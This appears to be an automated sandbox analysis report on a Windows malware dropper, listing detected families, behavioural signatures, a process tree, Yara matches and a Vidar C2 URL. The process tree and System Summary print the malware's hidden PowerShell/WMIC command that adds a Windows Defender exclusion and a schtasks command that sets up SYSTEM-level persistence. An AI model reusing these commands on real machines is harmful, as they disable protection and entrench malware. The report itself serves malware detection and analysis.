
Windows Analysis Report
file.exe

Overview

General Information

Sample name: file.exe
Analysis ID: 1430552
MD5: b9882fe8bb7ab2a4d094f9ff5442df1c
SHA1: e17c146530a4371e0595c195c24863935a3dee8b
SHA256: 4f47d84b03f5cfa3845d1b36df5e40df984756fc6ba2d98586eb39dced212628
Tags: exe, x64

Detection

Glupteba, Mars Stealer, PureLog Stealer, Stealc, Vidar, zgRAT
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for dropped file
Detected unpacking (changes PE section rights)
Detected unpacking (overwrites its own PE header)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Drops script at startup location
Yara detected Glupteba
Yara detected Mars stealer
Yara detected PureLog Stealer
Yara detected Stealc
Yara detected Vidar stealer
Yara detected zgRAT
Adds extensions / path to Windows Defender exclusion list (Registry)
Allocates memory in foreign processes
C2 URLs / IPs found in malware configuration
Checks if the current machine is a virtual machine (disk enumeration)
Creates HTML files with .exe extension (expired dropper behavior)
Disable Windows Defender real time protection (registry)
Disables Windows Defender (deletes autostart)
Drops PE files to the document folder of the user
Drops script or batch files to the startup folder
Exclude list of file types from scheduled, custom, and real-time scanning
Found Tor onion address
Found direct / indirect Syscall (likely to bypass EDR)
Hides threads from debuggers
Injects a PE file into a foreign processes
Installs new ROOT certificates
Machine Learning detection for dropped file
Modifies Group Policy settings
Overwrites code with unconditional jumps - possibly setting hooks in a foreign process
Query firmware table information (likely to detect VMs)
Sample uses process hollowing technique
Sample uses string decryption to hide its real strings
Sigma detected: Potentially Suspicious PowerShell Child Processes
Sigma detected: Suspicious Scheduled Task Creation Involving Temp Folder
Suspicious powershell command line found
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to evade debugger and weak emulator (self modifying code)
Tries to harvest and steal Bitcoin Wallet information
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
Tries to steal Mail credentials (via file / registry access)
Uses schtasks.exe or at.exe to add and modify task schedules
Writes many files with high entropy
Writes to foreign memory regions
Yara detected Generic Downloader
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Creates files inside the system directory
Creates job files (autostart)
Creates or modifies windows services
Deletes files inside the Windows folder
Detected potential crypto function
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Drops PE files to the windows directory (C:\Windows)
Drops files with a non-matching file extension (content does not match file extension)
Enables debug privileges
Entry point lies outside standard sections
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found decision node followed by non-executed suspicious APIs
Found dropped PE file which has not been started or loaded
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE / OLE file has an invalid certificate
PE file contains an invalid checksum
PE file contains executable resources (Code or Archives)
PE file contains sections with non-standard names
Queries information about the installed CPU (vendor, model number etc)
Queries keyboard layouts
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries the installation date of Windows
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Suspicious Add Scheduled Task Parent
Sigma detected: Suspicious Schtasks From Env Var Folder
Sigma detected: Windows Defender Exclusions Added - Registry
Stores files to the Windows start menu directory
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64
  • file.exe (PID: 7288 cmdline: "C:\Users\user\Desktop\file.exe" MD5: B9882FE8BB7AB2A4D094F9FF5442DF1C)
    • conhost.exe (PID: 7300 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • AddInProcess32.exe (PID: 7392 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe" MD5: 9827FF3CDF4B83F9C86354606736CA9C)
      • VtmtVe55Jwcf3rOGIU1yezyh.exe (PID: 7604 cmdline: "C:\Users\user\Pictures\VtmtVe55Jwcf3rOGIU1yezyh.exe" MD5: CCEE6D525CB5940F123C86DB6EDD40DA)
        • u5v8.0.exe (PID: 8120 cmdline: "C:\Users\user\AppData\Local\Temp\u5v8.0.exe" MD5: BCF475BE78F3965DD066CA8DABBEB31F)
        • Qg_Appv5.exe (PID: 3436 cmdline: "C:\Users\user\AppData\Local\Temp\Qg_Appv5.exe" MD5: 54D53F5BDB925B3ED005A84B5492447F)
      • 9wqoiPpK0NIQEBygxfm6h42G.exe (PID: 7740 cmdline: "C:\Users\user\Pictures\9wqoiPpK0NIQEBygxfm6h42G.exe" MD5: 3953BBAD77CDCB9D5AF2694EED7E6688)
        • UWxz0MPLJemfxFfuxrp6E5vU.exe (PID: 7488 cmdline: C:\Users\user\Documents\SimpleAdobe\UWxz0MPLJemfxFfuxrp6E5vU.exe MD5: A1789F6DBB08B8F49452DB52D3829002)
        • F0mqqGl9pK9gdOm2cnZsC1mR.exe (PID: 4108 cmdline: C:\Users\user\Documents\SimpleAdobe\F0mqqGl9pK9gdOm2cnZsC1mR.exe MD5: D15459E9B9D12244A57809BC383B2757)
      • i7gUU3MlvTwbsK8r3hAjzW0p.exe (PID: 7988 cmdline: "C:\Users\user\Pictures\i7gUU3MlvTwbsK8r3hAjzW0p.exe" MD5: AAA56797070369AD346FBD9BB6CC5E8B)
        • Install.exe (PID: 5660 cmdline: .\Install.exe /nxdidQZJ "385118" /S MD5: E77964E011D8880EAE95422769249CA4)
          • forfiles.exe (PID: 2552 cmdline: "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m where.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True" MD5: D95C443851F70F77427B3183B1619DD3)
            • conhost.exe (PID: 7532 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • cmd.exe (PID: 7356 cmdline: /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
              • powershell.exe (PID: 7688 cmdline: powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
                • WMIC.exe (PID: 2624 cmdline: "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True MD5: E2DE6500DE1148C7F6027AD50AC8B891)
          • schtasks.exe (PID: 3060 cmdline: schtasks /CREATE /TN "bWycNackLSywaqkmgR" /SC once /ST 21:38:00 /RU "SYSTEM" /TR "\"C:\Users\user\AppData\Local\Temp\JMPZeWvHhArmqROvY\NwfPJCCpQqPYDzK\koEMGMU.exe\" em /VNsite_idnLd 385118 /S" /V1 /F MD5: 48C2FE20575769DE916F48EF0676A965)
            • conhost.exe (PID: 5204 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • yPlMO3UKyKRvoEYPhbGYOyT0.exe (PID: 8132 cmdline: "C:\Users\user\Pictures\yPlMO3UKyKRvoEYPhbGYOyT0.exe" MD5: CCEE6D525CB5940F123C86DB6EDD40DA)
        • u69w.0.exe (PID: 3412 cmdline: "C:\Users\user\AppData\Local\Temp\u69w.0.exe" MD5: BCF475BE78F3965DD066CA8DABBEB31F)
        • u69w.1.exe (PID: 7208 cmdline: "C:\Users\user\AppData\Local\Temp\u69w.1.exe" MD5: 397926927BCA55BE4A77839B1C44DE6E)
      • B46afLBMY0mokUgVdA9CQR52.exe (PID: 5664 cmdline: "C:\Users\user\Pictures\B46afLBMY0mokUgVdA9CQR52.exe" MD5: CCEE6D525CB5940F123C86DB6EDD40DA)
        • u4dc.0.exe (PID: 8156 cmdline: "C:\Users\user\AppData\Local\Temp\u4dc.0.exe" MD5: BCF475BE78F3965DD066CA8DABBEB31F)
      • t7IXQJi6R3tWUMJ8f9cQzMWm.exe (PID: 1940 cmdline: "C:\Users\user\Pictures\t7IXQJi6R3tWUMJ8f9cQzMWm.exe" MD5: CCEE6D525CB5940F123C86DB6EDD40DA)
      • l0nXYBHJHVq6UHyy1YDO9fn3.exe (PID: 4008 cmdline: "C:\Users\user\Pictures\l0nXYBHJHVq6UHyy1YDO9fn3.exe" MD5: CCEE6D525CB5940F123C86DB6EDD40DA)
      • wr6XLbv7Ijp4TImjm1ouF4U2.exe (PID: 8088 cmdline: "C:\Users\user\Pictures\wr6XLbv7Ijp4TImjm1ouF4U2.exe" MD5: 3953BBAD77CDCB9D5AF2694EED7E6688)
      • PA8JWMmRYiQsN7iqTjOvjsbW.exe (PID: 8176 cmdline: "C:\Users\user\Pictures\PA8JWMmRYiQsN7iqTjOvjsbW.exe" MD5: F6C9E6F8396274E57FBA6BE593B90E36)
      • zUOgRazdYnb35XHU4UIsV9Yc.exe (PID: 7204 cmdline: "C:\Users\user\Pictures\zUOgRazdYnb35XHU4UIsV9Yc.exe" MD5: F6C9E6F8396274E57FBA6BE593B90E36)
      • 6dpl9L7LbyabhVQNXZXXKjGL.exe (PID: 5812 cmdline: "C:\Users\user\Pictures\6dpl9L7LbyabhVQNXZXXKjGL.exe" MD5: CCEE6D525CB5940F123C86DB6EDD40DA)
      • 0FR80IiNvxJZyXnpOgiDlYNV.exe (PID: 4252 cmdline: "C:\Users\user\Pictures\0FR80IiNvxJZyXnpOgiDlYNV.exe" MD5: F6C9E6F8396274E57FBA6BE593B90E36)
      • 68bEfZA6FBu6lC5BaADYSIdx.exe (PID: 7592 cmdline: "C:\Users\user\Pictures\68bEfZA6FBu6lC5BaADYSIdx.exe" MD5: F6C9E6F8396274E57FBA6BE593B90E36)
      • ikL90ODaFTS7N6FbOffM2D1B.exe (PID: 7852 cmdline: "C:\Users\user\Pictures\ikL90ODaFTS7N6FbOffM2D1B.exe" MD5: CCEE6D525CB5940F123C86DB6EDD40DA)
      • ka1rT1Ln7XhH1aQSgOeo3013.exe (PID: 3956 cmdline: "C:\Users\user\Pictures\ka1rT1Ln7XhH1aQSgOeo3013.exe" MD5: 3953BBAD77CDCB9D5AF2694EED7E6688)
      • G3pV8gTsWQBVrGpK4ooPrlxI.exe (PID: 5416 cmdline: "C:\Users\user\Pictures\G3pV8gTsWQBVrGpK4ooPrlxI.exe" MD5: CCEE6D525CB5940F123C86DB6EDD40DA)
      • vU4jsQbpuBQoMcavMx7b1jzX.exe (PID: 1588 cmdline: "C:\Users\user\Pictures\vU4jsQbpuBQoMcavMx7b1jzX.exe" --silent --allusers=0 MD5: 409B00F4B0A921D4691FE3EFB0AD4092)
      • OYqxk9G3x4R05N4I0KLZXbXg.exe (PID: 6752 cmdline: "C:\Users\user\Pictures\OYqxk9G3x4R05N4I0KLZXbXg.exe" MD5: F6C9E6F8396274E57FBA6BE593B90E36)
      • nxx62MIcAq1mLUazdUlt2emv.exe (PID: 4172 cmdline: "C:\Users\user\Pictures\nxx62MIcAq1mLUazdUlt2emv.exe" --silent --allusers=0 MD5: 2CF99CA2E0CB98555FCA7D2FB3187553)
  • svchost.exe (PID: 7860 cmdline: C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • svchost.exe (PID: 7868 cmdline: C:\Windows\System32\svchost.exe -k NetSvcs -p -s NcaSvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • svchost.exe (PID: 7876 cmdline: C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • cmd.exe (PID: 1168 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ECVVQonpjDvaVVq8u9A57jpg.bat" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • conhost.exe (PID: 3124 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • H6XhhPCeuwAb2QQK3C3B1Lwl.exe (PID: 3572 cmdline: "C:\Users\user\AppData\Local\H6XhhPCeuwAb2QQK3C3B1Lwl.exe" MD5: CCEE6D525CB5940F123C86DB6EDD40DA)
  • koEMGMU.exe (PID: 4868 cmdline: C:\Users\user\AppData\Local\Temp\JMPZeWvHhArmqROvY\NwfPJCCpQqPYDzK\koEMGMU.exe em /VNsite_idnLd 385118 /S MD5: E77964E011D8880EAE95422769249CA4)
  • cleanup
Name: Glupteba
Description: Glupteba is a trojan horse malware that is one of the top ten malware variants of 2021. After infecting a system, the Glupteba malware can be used to deliver additional malware, steal user authentication information, and enroll the infected system in a cryptomining botnet.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.glupteba

Name: Stealc
Description: Stealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, Stealc is a non-resident stealer with flexible data collection settings, and its development relies on other prominent stealers: Vidar, Raccoon, Mars and Redline. Stealc is written in C and uses WinAPI functions. It mainly targets data from web browsers, browser extensions and desktop applications of cryptocurrency wallets, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.stealc

Name: Vidar
Description: Vidar is a forked malware based on Arkei. It seems this stealer is one of the first that grabs information on 2FA software and Tor Browser.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.vidar

Name: zgRAT
Description: zgRAT is a Remote Access Trojan which sometimes drops other malware such as AgentTesla. zgRAT has an infostealer capability that targets browser information and crypto wallets. It usually spreads by USB or by phishing emails with .zip/.lnk/.bat/.xlsx attachments and so on.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.zgrat

Malware configuration (Vidar, from the Malware Configuration Extractor): {"C2 url": "http://185.172.128.76/3cd2b41cbde8fc9c.php"}
Yara matches in dropped files (Source; Rule; Description; Author; Strings)
Source: C:\Users\user\Documents\SimpleAdobe\KPGhFRImEtP9uUl6Tmi54GCR.exe; Rule: JoeSecurity_GenericDownloader_1; Description: Yara detected Generic Downloader; Author: Joe Security
Source: C:\Users\user\Documents\SimpleAdobe\KPGhFRImEtP9uUl6Tmi54GCR.exe; Rule: JoeSecurity_zgRAT_1; Description: Yara detected zgRAT; Author: Joe Security
Source: C:\Users\user\Documents\SimpleAdobe\KPGhFRImEtP9uUl6Tmi54GCR.exe; Rule: JoeSecurity_PureLogStealer; Description: Yara detected PureLog Stealer; Author: Joe Security
Source: C:\Users\user\Documents\SimpleAdobe\KPGhFRImEtP9uUl6Tmi54GCR.exe; Rule: MALWARE_Win_zgRAT; Description: Detects zgRAT; Author: ditekSHen
        • 0x9f3d7:$s1: file:///
        • 0x9f2e7:$s2: {11111-22222-10009-11112}
        • 0x9f367:$s3: {11111-22222-50001-00000}
        • 0x9e020:$s4: get_Module
        • 0x387350:$s4: get_Module
        • 0x8a805:$s5: Reverse
        • 0x8a811:$s5: Reverse
        • 0x8a819:$s5: Reverse
        • 0x9ce9a:$s6: BlockCopy
        • 0x386b22:$s7: ReadByte
        • 0x9f3e9:$s8: 4C 00 6F 00 63 00 61 00 74 00 69 00 6F 00 6E 00 00 0B 46 00 69 00 6E 00 64 00 20 00 00 13 52 00 65 00 73 00 6F 00 75 00 72 00 63 00 65 00 41 00 00 11 56 00 69 00 72 00 74 00 75 00 61 00 6C 00 ...
Source: C:\Users\user\AppData\Local\Temp\u624.1.exe; Rule: JoeSecurity_DelphiSystemParamCount; Description: Detected Delphi use of System.ParamCount(); Author: Joe Security

Yara matches in memory dumps (Source; Rule; Description; Author; Strings)
Source: 00000015.00000002.1918521862.00000000041C0000.00000040.00001000.00020000.00000000.sdmp; Rule: Windows_Trojan_Smokeloader_3687686f; Description: unknown; Author: unknown
        • 0x30d:$a: 0C 8B 45 F0 89 45 C8 8B 45 C8 8B 40 3C 8B 4D F0 8D 44 01 04 89
Source: 00000029.00000002.2099601729.00000000041B0000.00000040.00001000.00020000.00000000.sdmp; Rule: Windows_Trojan_Smokeloader_3687686f; Description: unknown; Author: unknown
        • 0x30d:$a: 0C 8B 45 F0 89 45 C8 8B 45 C8 8B 40 3C 8B 4D F0 8D 44 01 04 89
Source: 00000029.00000003.2080394798.0000000006A3A000.00000004.00000020.00020000.00000000.sdmp; Rule: JoeSecurity_DelphiSystemParamCount; Description: Detected Delphi use of System.ParamCount(); Author: Joe Security
Source: 00000013.00000002.1917490394.000000000418C000.00000040.00000020.00020000.00000000.sdmp; Rule: Windows_Trojan_RedLineStealer_ed346e4c; Description: unknown; Author: unknown
        • 0xca8:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
Source: 0000001F.00000003.1544893473.00000000041E0000.00000004.00001000.00020000.00000000.sdmp; Rule: JoeSecurity_Vidar_1; Description: Yara detected Vidar stealer; Author: Joe Security

Yara matches in unpacked PEs (Source; Rule; Description; Author; Strings)
Source: 10.3.u5v8.0.exe.4200000.0.unpack; Rule: JoeSecurity_Vidar_1; Description: Yara detected Vidar stealer; Author: Joe Security
Source: 10.3.u5v8.0.exe.4200000.0.unpack; Rule: JoeSecurity_MarsStealer; Description: Yara detected Mars stealer; Author: Joe Security
Source: 20.3.u69w.0.exe.41d0000.0.unpack; Rule: JoeSecurity_Vidar_1; Description: Yara detected Vidar stealer; Author: Joe Security
Source: 20.3.u69w.0.exe.41d0000.0.unpack; Rule: JoeSecurity_MarsStealer; Description: Yara detected Mars stealer; Author: Joe Security
Source: 36.1.0FR80IiNvxJZyXnpOgiDlYNV.exe.400000.0.unpack; Rule: JoeSecurity_Glupteba; Description: Yara detected Glupteba; Author: Joe Security

System Summary

Source: Process started; Author: Florian Roth (Nextron Systems), Tim Shelton; Data: Command: "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True, CommandLine: "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True, CommandLine|base64offset|contains: <, Image: C:\Windows\SysWOW64\wbem\WMIC.exe, NewProcessName: C:\Windows\SysWOW64\wbem\WMIC.exe, OriginalFileName: C:\Windows\SysWOW64\wbem\WMIC.exe, ParentCommandLine: powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True, ParentImage: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 7688, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True, ProcessId: 2624, ProcessName: WMIC.exe
Source: Process started; Author: Florian Roth (Nextron Systems); Data: Command: schtasks /CREATE /TN "bWycNackLSywaqkmgR" /SC once /ST 21:38:00 /RU "SYSTEM" /TR "\"C:\Users\user\AppData\Local\Temp\JMPZeWvHhArmqROvY\NwfPJCCpQqPYDzK\koEMGMU.exe\" em /VNsite_idnLd 385118 /S" /V1 /F, CommandLine: schtasks /CREATE /TN "bWycNackLSywaqkmgR" /SC once /ST 21:38:00 /RU "SYSTEM" /TR "\"C:\Users\user\AppData\Local\Temp\JMPZeWvHhArmqROvY\NwfPJCCpQqPYDzK\koEMGMU.exe\" em /VNsite_idnLd 385118 /S" /V1 /F, CommandLine|base64offset|contains: mj,, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: .\Install.exe /nxdidQZJ "385118" /S, ParentImage: C:\Users\user\AppData\Local\Temp\7zS1198.tmp\Install.exe, ParentProcessId: 5660, ParentProcessName: Install.exe, ProcessCommandLine: schtasks /CREATE /TN "bWycNackLSywaqkmgR" /SC once /ST 21:38:00 /RU "SYSTEM" /TR "\"C:\Users\user\AppData\Local\Temp\JMPZeWvHhArmqROvY\NwfPJCCpQqPYDzK\koEMGMU.exe\" em /VNsite_idnLd 385118 /S" /V1 /F, ProcessId: 3060, ProcessName: schtasks.exe
Source: Registry Key set; Author: Christian Burkard (Nextron Systems); Data: Details: 1, EventID: 13, EventType: SetValue, Image: C:\Users\user\Pictures\9wqoiPpK0NIQEBygxfm6h42G.exe, ProcessId: 7740, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\group policy objects\{AF4B7D10-C04F-40BD-A9F0-1F789BBF0FCA}Machine\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Exclusions_Extensions
Source: Process started; Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements); Data: Command: powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True, CommandLine: powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True, CommandLine|base64offset|contains: ^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 7356, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True, ProcessId: 7688, ProcessName: powershell.exe
Source: Process started; Author: vburov; Data: Command: C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc, CommandLine: C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 620, ProcessCommandLine: C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc, ProcessId: 7860, ProcessName: svchost.exe

Data Obfuscation

Source: File created; Author: Joe Security; Data: EventID: 11, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe, ProcessId: 7392, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ECVVQonpjDvaVVq8u9A57jpg.bat

No Snort rule has matched

AV Detection

Source: C:\Users\user\AppData\Local\6uk7M8l1XN7kn2GGjKmOMQUi.exe; Avira: detection malicious, Label: HEUR/AGEN.1313019
Source: C:\Users\user\AppData\Local\9JPBg0fN0RIfaIShEtttlmtW.exe; Avira: detection malicious, Label: HEUR/AGEN.1313019
Source: C:\Users\user\AppData\Local\0yHxI2NgcVq897URfu1bGLCU.exe; Avira: detection malicious, Label: HEUR/AGEN.1313019
Source: C:\Users\user\AppData\Local\10ff9npsu4lZrEUNQDLknd3T.exe; Avira: detection malicious, Label: HEUR/AGEN.1313019
Source: C:\Users\user\AppData\Local\0WEfXyMPJw5gbxAkYoQ7foIu.exe; Avira: detection malicious, Label: HEUR/AGEN.1313019
Source: 0000001F.00000003.1544893473.00000000041E0000.00000004.00001000.00020000.00000000.sdmp; Malware Configuration Extractor: Vidar {"C2 url": "http://185.172.128.76/3cd2b41cbde8fc9c.php"}
Source: C:\Users\user\AppData\Local\4H9gwSn9hsmr1uT7Ln1OMxxi.exe; ReversingLabs: Detection: 16%
Source: C:\Users\user\AppData\Local\4atMces8tYoo96OnbLT8HE6O.exe; ReversingLabs: Detection: 16%
Source: C:\Users\user\AppData\Local\8FauF1Ec16N4pbn45vApMB9Y.exe; ReversingLabs: Detection: 16%
Source: C:\Users\user\AppData\Local\F9a5CAWDzjn4KX6pZMk93eNG.exe; ReversingLabs: Detection: 75%
Source: C:\Users\user\AppData\Local\H9xPrDydeyqRWbh69y5tSjbf.exe; ReversingLabs: Detection: 16%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9H3TYFD3\Default12_my[1].exe; ReversingLabs: Detection: 21%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\DQNVS06W\Space_my[1].exe; ReversingLabs: Detection: 24%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W9FILL1W\123p[1].exe; ReversingLabs: Detection: 87%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W9FILL1W\Retailer_prog[1].exe; ReversingLabs: Detection: 29%
Source: C:\Users\user\AppData\Local\NdBfL9GQKAuQALK03ZlcLnBv.exe; ReversingLabs: Detection: 75%
Source: C:\Users\user\AppData\Local\OFQ7ZJkbPO93pwjUuJw87q34.exe; ReversingLabs: Detection: 16%
Source: C:\Users\user\AppData\Local\Pb9nMKWmPyxCQFZJxeJuCUeo.exe; ReversingLabs: Detection: 16%
Source: C:\Users\user\AppData\Local\ShiCqBALVwHXuLXc8u9Hf2su.exe; ReversingLabs: Detection: 16%
Source: file.exe; ReversingLabs: Detection: 57%
Source: Yara match; File source: 36.1.0FR80IiNvxJZyXnpOgiDlYNV.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match; File source: 32.1.PA8JWMmRYiQsN7iqTjOvjsbW.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match; File source: 33.1.zUOgRazdYnb35XHU4UIsV9Yc.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match; File source: 43.1.OYqxk9G3x4R05N4I0KLZXbXg.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match; File source: 38.1.68bEfZA6FBu6lC5BaADYSIdx.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match; File source: 00000024.00000001.2063500056.0000000000843000.00000040.00000001.01000000.0000001B.sdmp, type: MEMORY
Source: Yara match; File source: 00000020.00000001.1883456337.0000000000843000.00000040.00000001.01000000.00000017.sdmp, type: MEMORY
Source: Yara match; File source: 00000021.00000001.1945506899.0000000000843000.00000040.00000001.01000000.00000018.sdmp, type: MEMORY
Source: Yara match; File source: 0000002B.00000001.1972234564.0000000000843000.00000040.00000001.01000000.00000022.sdmp, type: MEMORY
Source: Yara match; File source: 00000026.00000001.2017532049.0000000000843000.00000040.00000001.01000000.0000001D.sdmp, type: MEMORY
Source: Yara match; File source: Process Memory Space: PA8JWMmRYiQsN7iqTjOvjsbW.exe PID: 8176, type: MEMORYSTR
Source: Yara match; File source: Process Memory Space: zUOgRazdYnb35XHU4UIsV9Yc.exe PID: 7204, type: MEMORYSTR
Source: Yara match; File source: Process Memory Space: 0FR80IiNvxJZyXnpOgiDlYNV.exe PID: 4252, type: MEMORYSTR
Source: C:\Users\user\AppData\Local\6uk7M8l1XN7kn2GGjKmOMQUi.exe; Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\9JPBg0fN0RIfaIShEtttlmtW.exe; Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\0yHxI2NgcVq897URfu1bGLCU.exe; Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\10ff9npsu4lZrEUNQDLknd3T.exe; Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\8Hs13Qx2L9GIxFG02dQv6hVO.exe; Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\BCSbmKJiX30BH99M4SeS6WhT.exe; Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\0WEfXyMPJw5gbxAkYoQ7foIu.exe; Joe Sandbox ML: detected
Source: 10.3.u5v8.0.exe.4200000.0.raw.unpack; String decryptor: INSERT_KEY_HERE
Source: 10.3.u5v8.0.exe.4200000.0.raw.unpack; String decryptor: GetProcAddress
